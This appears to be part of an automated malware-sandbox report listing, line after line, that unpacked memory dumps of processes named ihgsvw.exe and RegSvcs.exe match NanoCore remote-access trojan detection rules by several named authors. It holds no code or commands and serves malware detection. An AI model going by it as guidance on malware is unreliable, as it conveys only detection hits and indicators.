Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
